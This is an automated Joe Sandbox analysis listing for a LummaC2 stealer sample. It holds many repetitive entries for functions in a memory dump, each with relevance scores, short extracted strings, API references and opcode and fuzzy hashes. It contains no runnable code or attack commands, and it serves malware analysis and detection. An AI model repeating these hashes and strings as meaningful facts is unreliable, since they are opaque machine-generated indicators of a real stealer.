Instruction ID: dee115e74a7da51e75b0dd05acb7dc20f6b6e82df99f633f2060fbe8eaafe013
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: E0C1387160C3908FD319CF3984A07ABBBE29FD7315F18896CE4E54B396D639490ACB52

Function 009D8095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

Q230, xrefs: 009D8B93
K, xrefs: 009D8162
(, xrefs: 009D82E1
d, xrefs: 009D8726
', xrefs: 009D9102

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 1ed5f93b3046f228b7d93b1b302b8f132ab30fc0593a920a680079be0e67205f
Instruction ID: 0b37c0e1572ce39cca53def9bba292886d96bdbf59172fea46c40fdacd597965
Opcode Fuzzy Hash: 1ed5f93b3046f228b7d93b1b302b8f132ab30fc0593a920a680079be0e67205f
Instruction Fuzzy Hash: 749259716083418BD724CF28C8917ABB7E2FFD9354F18896DE5C58B392EB348946CB52

Function 009E26D3 Relevance: 7.0, Strings: 5, Instructions: 769COMMON

Download Yara Rule

Strings

r~, xrefs: 009E2A16
1{, xrefs: 009E2A0E
?<, xrefs: 009E2AB6
zw, xrefs: 009E2A06
0, xrefs: 009E2888

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$?<$r~$zw
API String ID: 0-3209727026
Opcode ID: 093f2c8f650529a1cf6899d928d3fff1e2ef823b79e341be5cbd5a7483a31945
Instruction ID: 1969dbfe27951dded9c9d2cbc1143a5ab2b237f6acc70c6b08480612246454e1
Opcode Fuzzy Hash: 093f2c8f650529a1cf6899d928d3fff1e2ef823b79e341be5cbd5a7483a31945
Instruction Fuzzy Hash: 44421475608395CFD329CF25D89076ABBE6FB89300F19896CE9D54B391DB749C02CB82

Function 009E70F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

LL, xrefs: 009E72E0
>.8, xrefs: 009E74AC
p, xrefs: 009E72D9
=&2), xrefs: 009E74BA

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 55b2fa1ab39e3b924f44759561367bbc3335888d42da712015543dd40b9ca523
Instruction ID: b6495128cc2447c8c0ec7d778bc21a92f9c9f66b3cea1698f8e15c48674a2357
Opcode Fuzzy Hash: 55b2fa1ab39e3b924f44759561367bbc3335888d42da712015543dd40b9ca523
Instruction Fuzzy Hash: 544211B5E04615CFDB18CFA9D85176AB7B2FF88310F18822CD416AB395DB34AC12CB91

Function 009CC97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

r~, xrefs: 009CD02F
zw, xrefs: 009CD019
1{, xrefs: 009CD024
?<, xrefs: 009CD0C2

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: 41e06bea3eae29dfddc43cd3d03f2f8f9f87faa062dfc3ddfcfb0b720c692853
Instruction ID: 617617ff787631d4475689460f06f252e38aa04a2d26a6571a4170742a1a7680
Opcode Fuzzy Hash: 41e06bea3eae29dfddc43cd3d03f2f8f9f87faa062dfc3ddfcfb0b720c692853
Instruction Fuzzy Hash: 1702A9B05093C18AD735CF29D494BEFBBE1ABD6344F18896CC8D99B252C7384946CB93

Function 009DC205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

|r, xrefs: 009DC5CC
./, xrefs: 009DC544
g`a, xrefs: 009DC864
{x, xrefs: 009DC6B5

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: 39f5ed772d48265f4374292459aad0424a76355ad8651afc15e43dc1ae3c8309
Instruction ID: 6c6a02ce0ab46f23cf7ebf4996b011b2a636c14584e80f8911a4652597d1cf5d
Opcode Fuzzy Hash: 39f5ed772d48265f4374292459aad0424a76355ad8651afc15e43dc1ae3c8309
Instruction Fuzzy Hash: A3F128B7A5C3109FD308DF699C4265FFAE2EBD4304F19C92DE8D49B345DA3886058B86

Function 009F1D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 009F1D59
GetSystemMetrics.USER32 ref: 009F1D69

Strings

, xrefs: 009F1E56

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: a4b8bd26e5aadf93e1c1140c244d6fbd8108492f3d47239e08947189124047be
Instruction ID: 92d5efb2d7f63919ee586dd17a767065ef136dd935c97fde5101d03dd3e96f1d
Opcode Fuzzy Hash: a4b8bd26e5aadf93e1c1140c244d6fbd8108492f3d47239e08947189124047be
Instruction Fuzzy Hash: FAA16CB05593898FD370DF24E488B9BBBF0BB85308F90892DE5989B690D7B59458CF43

Function 009E59B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

!J, xrefs: 009E5A67
Y\, xrefs: 009E5A5F
/V, xrefs: 009E5A57
U+, xrefs: 009E5A4F

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 96fc82d18a49368356cc7c176d83eb6231cb1443760744304bdfa1e7419dee21
Instruction ID: 5689db429ca2a45a1feeaca75fcbd933f7b8aab8c8270b99b397c3eccd3ebd73
Opcode Fuzzy Hash: 96fc82d18a49368356cc7c176d83eb6231cb1443760744304bdfa1e7419dee21
Instruction Fuzzy Hash: CEE12FB5608348EFE724CF65E89176BB7E5FB85304F54882CE6D54B262D734880ACF52

Function 009CAB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

nww, xrefs: 009CAD87
tefr, xrefs: 009CADEE
tefr, xrefs: 009CAD20, 009CAEE3, 009CAD64, 009CAED7, 009CAF78, 009CAFAC, 009CAF81
a|}r, xrefs: 009CAC66

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: beffe8553e6a6dfad10c7afd83d04a6d797b0689e8cc53132a54df637a8cc687
Instruction ID: c11a0d1a11526eb66cddf5256783995a11bb1d634cd7db2215547ebdc4e3782c
Opcode Fuzzy Hash: beffe8553e6a6dfad10c7afd83d04a6d797b0689e8cc53132a54df637a8cc687
Instruction Fuzzy Hash: DBC107B1A4C3584BD320EF2498517AFFBE6DBD1308F58896CE4D58F346D635880A8B97

Function 009EC894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

@, xrefs: 009ECBB3
0, xrefs: 009ECB61
d, xrefs: 009ECACA
^TFW, xrefs: 009ECC43

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: d7af976e58301b645d0f2016a2b56651662272bcfd24580493cc2aeea7cb31ca
Instruction ID: bec436f5c12241f753fe8402f6c20dcf2e36d2d1f1edf2bdd2ef76518fedbab3
Opcode Fuzzy Hash: d7af976e58301b645d0f2016a2b56651662272bcfd24580493cc2aeea7cb31ca
Instruction Fuzzy Hash: 657128A120C3D14BD319CF3A84A133BBFD1AFD6304F68896DE4D68B392D6788946C752

Function 009EB695 Relevance: 5.1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

Strings

O>8), xrefs: 009EB7F9
5++r, xrefs: 009EB722
^_[E, xrefs: 009EB7D9
]>8), xrefs: 009EB820

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 5++r$O>8)$]>8)$^_[E
API String ID: 0-2089560213
Opcode ID: 6d67cfe2e3a40d55dd9cb09286c47ebc8ec7ea95608970f8ac2c8b08ced05978
Instruction ID: aa4576c1762e6eb06d7d8ed5a4ad664198b3a6481672f24386394d8299033c37
Opcode Fuzzy Hash: 6d67cfe2e3a40d55dd9cb09286c47ebc8ec7ea95608970f8ac2c8b08ced05978
Instruction Fuzzy Hash: A951187550C3C54BD7258F39C8A43EBBBE6AFE6304F2888ADD0C987641DF39450A8B56

Function 009CD35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 009CD368
CoUninitialize.OLE32 ref: 009CD7A4

Strings

(P, xrefs: 009CD7B2

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: 0e6823a5fb7426c4c62ac2ec298214c98751a628a857cf9dc3049533130a3181
Instruction ID: 8507e7e5307705a80f2c737763a98c1aec5ea7f9ccb4286ca62f73744ac0b44c
Opcode Fuzzy Hash: 0e6823a5fb7426c4c62ac2ec298214c98751a628a857cf9dc3049533130a3181
Instruction Fuzzy Hash: 3622E17194E3C18AD335CF39D490BAABFE1AF96304F188AACD4D95B242D7354506CB92

Function 009FA800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

@Y?., xrefs: 009FAC15
<Y?., xrefs: 009FABDB
f, xrefs: 009FAA31

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: d7ab4df25bb530b41d8e369001878ac7fee4a48d4cde9affbd12c8bc73f12582
Instruction ID: 2c5b4900ada307d00483453e3605e0f795ad12d88b5fbd42f06b00c2f80d9b67
Opcode Fuzzy Hash: d7ab4df25bb530b41d8e369001878ac7fee4a48d4cde9affbd12c8bc73f12582
Instruction Fuzzy Hash: 6D22F1B16083459FD714CF28C891B3BBBE6BBD9314F18892CE6D987392D635DC068B52

Function 009C9710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

p, xrefs: 009C9936
v~, xrefs: 009C9A04
HVKG, xrefs: 009C97A0

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 4d96e30f6980b749c60db25cc18ee9d3dce3d27da95ce786cad94f25f8e84282
Instruction ID: 51007d5824fa24769e9bda26c121ef66b7c9d19dcec98c8f7489e893af39fddb
Opcode Fuzzy Hash: 4d96e30f6980b749c60db25cc18ee9d3dce3d27da95ce786cad94f25f8e84282
Instruction Fuzzy Hash: 38B12471A0C7408BE314CF65D895BABBBE5EBD2314F14496CE0E18B292D778D90ACB53

Function 009EBF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

@a, xrefs: 009EC2AF
L,2H, xrefs: 009EBF4D
u, xrefs: 009EC364

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: f81252960e7beff94b2d3e4e171fc406622d0d49f071c2b7bdc41c2b78a4fe8f
Instruction ID: 6efc61bc7a69bf035e70ce2b2864f68a995a95b037ef60e116cae91ea6e21575
Opcode Fuzzy Hash: f81252960e7beff94b2d3e4e171fc406622d0d49f071c2b7bdc41c2b78a4fe8f
Instruction Fuzzy Hash: F291E2B050C3C18FD72ACF3A84607ABBBE1AFA7304F18499DE0D997292D7358506CB16

Function 009EC984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

@, xrefs: 009ECBB3
d, xrefs: 009ECACA
^TFW, xrefs: 009ECC43

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 058e20bc73449604715ae9d723c49c21ec46f9ebd90595a90d29b1ce99655b0e
Instruction ID: 2443af3cfe9910512bc6a6605ec8106701c3176c7b200efddc48a92ff15c6678
Opcode Fuzzy Hash: 058e20bc73449604715ae9d723c49c21ec46f9ebd90595a90d29b1ce99655b0e
Instruction Fuzzy Hash: 3E7128A120C3D14BD319CF3A84A133BBFD1AFD6304F68896DE4D68B391D6748946C752

Function 009EC9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

@, xrefs: 009ECBB3
d, xrefs: 009ECACA
^TFW, xrefs: 009ECC43

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 8adf702ba2cf2b2d126c2daacd671870c0db9d30ef2fe97884cae6b62f690379
Instruction ID: b0e29f51ab64c6550bcb217a598f1981afe353e68fe71b7f132655174e5b8862
Opcode Fuzzy Hash: 8adf702ba2cf2b2d126c2daacd671870c0db9d30ef2fe97884cae6b62f690379
Instruction Fuzzy Hash: 027126A120C3C14BD319CF3A84A133BBFD1AFD6304F68896DE4D68B291D674C846CB52

Function 009EC9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

@, xrefs: 009ECBB3
d, xrefs: 009ECACA
^TFW, xrefs: 009ECC43

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 02ad0bfc71ec8c43a1e91532456e94aba87a79c7a463e06445d4d05cd51382ec
Instruction ID: ae872325025ed6b3cc8e01c565f70eeadc2110965a6369d1c938836d1aaf9373
Opcode Fuzzy Hash: 02ad0bfc71ec8c43a1e91532456e94aba87a79c7a463e06445d4d05cd51382ec
Instruction Fuzzy Hash: E46145A110C3C14BD319CF3A84A133BBFD1AFE6304F68896DE4D68B282D2348907CB52

Function 009E5640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

)G, xrefs: 009E58D4
AF, xrefs: 009E58DC
O6E4, xrefs: 009E593D, 009E594C

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: 4f1b9acda3ea75b4cc22dde31f5870e069081895d6f7816fffbc816b6fbe3123
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: A5814AB1A083508BD7149F15C89136FB7E2FFD1754F1A891CE4C58B391EB798905CB92

Function 009D64E0 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

pv, xrefs: 009D6702
tuz, xrefs: 009D670D
L4, xrefs: 009D6570

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: pv$tuz$L4
API String ID: 2994545307-3236822430
Opcode ID: ae7c55ff43a849ad8c6279878e5d6ffb54d6c85366f780e7d12c14fccbf73a95
Instruction ID: 313392d211202225b9a4b349671bfeb30236cac7547a7be30ce71e0b75e4c6f8
Opcode Fuzzy Hash: ae7c55ff43a849ad8c6279878e5d6ffb54d6c85366f780e7d12c14fccbf73a95
Instruction Fuzzy Hash: E18101726483558BD720CF64DC917AB73E6FFC8314F18893CE5898B295EB34A846CB52

Function 009D720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

!, xrefs: 009D78E5
1, xrefs: 009D7631

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: 5cf33e4cb939f51fb95528f43495b002458abf756fdf430c8f20abdcd73e1b08
Instruction ID: c6554900bcba60919a174c1ff70414cf735b35316c8c1a3c77a6da0c236f4464
